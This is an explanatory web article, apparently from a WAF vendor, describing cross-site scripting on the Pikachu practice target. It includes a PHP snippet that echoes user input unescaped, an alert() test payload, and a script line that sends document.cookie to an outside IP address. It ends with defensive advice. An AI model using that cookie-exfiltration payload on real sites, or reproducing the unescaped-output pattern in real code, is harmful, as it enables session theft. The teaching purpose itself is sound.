Cross Site Scripting (XSS)

A Cross Site Scripting (XSS) Attack targets the user’s browser by injecting malicious JavaScript code into a website. There are several different vulnerabilities exploited to add malicious JavaScript code to websites. A successful XSS attack would give the attacker access to the user’s browser and the user’s session information on the hacked website.

Cross Site Scripting (XSS) attacks exploit vulnerabilities in web applications that fail to properly sanitize input from users. These vulnerabilities allow attackers to inject malicious JavaScript code into web pages viewed by other users. The injected scripts can be executed in the context of the user’s session, giving attackers access to sensitive information such as session tokens, cookies, and personal data. This can lead to unauthorized access to the user’s accounts and private information.

Types of XSS Attacks

There are different types of XSS attacks:

1. Stored (or Persistent) XSS: Malicious scripts are directly inserted into a website’s database.
2. Reflected XSS: Involves sending the script to a user in an email or a link, which then reflects back from the website to the user’s browser.
3. DOM-based XSS: Exploits the Document Object Model of the website and occurs entirely in the browser.

An Example of a Cross Site Scripting (XSS)  Vulnerability

XSS vulnerabilities have consistently been evaluated as one of the most severe web vulnerabilities, consistently ranking among the top three in the OWASP Top 10. As we explored above, XSS is a type of vulnerability that occurs on the front end, specifically within the browser, so the affected targets are also front-end users. The primary cause of XSS vulnerabilities is the application’s inadequate handling of input and output, leading to “specially crafted” characters being interpreted and executed as valid code by the browser, thereby causing harm.

The Cross-Site-Scripting module of the Pikachu target machine allows us to provide an example vulnerability.

Entering “kobe” into the input box of the target machine will return a photo of the basketball player Kobe Bryant and a motivational quote: “May you be forever young and passionate, just like Kobe!”

Analyzing the backend PHP code we can see that the code directly returns the user’s input for the message parameter in the motivational quote without any processing, creating an XSS vulnerability.

if(isset($_GET['submit'])){ 

    if(empty($_GET['message'])){ 

        $html.="<p class='notice'>Try entering 'kobe' -_-</p>"; 

    }else{ 

        if($_GET['message']=='kobe'){ 

            $html.="<p class='notice'>May you always be young and passionate like{$_GET['message']}！</p><img src='{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png' />"; 

        }else{ 

            $html.="<p class='notice'>who is {$_GET['message']},i don't care!</p>"; //The code directly returns the user's input for the message parameter in the motivational quote without any processing.

        } 

    } 

}

XSS Attack Demonstration

In the input box, entering the XSS payload statement – kobe <script>alert(/Iverson best/)</script>, reveals that the input box has a restriction on input length.

As mentioned earlier, XSS is a type of vulnerability that occurs on the frontend, specifically within the browser. Therefore, the affected targets are also front-end users. Let’s modify this length restriction as follows:

Entering kobe <script>alert(/Iverson best/)</script> again will result in a pop-up window.

The issue occurred because the backend code failed to process the user input and simply returned it to the client. As a result, the JavaScript code for the pop-up we entered was also returned directly, causing the browser to execute the code and display the pop-up window.

When attackers discover an XSS vulnerability on a website, they can exploit it to steal user cookies, conduct phishing attacks, and more. For instance, they could enter the following attack code into the input box:

<script>document.location = 'http://47.96.96.34/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

Once the browser executes this JS code, it will send the cookies to the attacker’s remote server at 47.96.96.34.

How to Defend Against XSS Attacks?

To defend against XSS attacks, web developers must ensure proper input validation and output encoding. This includes sanitizing user input by filtering out or escaping characters that could be interpreted as code. Using Content Security Policy (CSP) headers can also help in preventing XSS by allowing websites to specify which sources are trusted, thereby blocking the execution of scripts from unauthorized sources. Regularly updating and patching web applications is crucial to defend against new vulnerabilities that attackers might exploit. Additionally, educating users about the dangers of clicking on unknown links and ensuring their browser is up to date can also reduce the risk of falling victim to XSS attacks.

Explore more about CDNetworks’ WAF to prevent XSS attacks.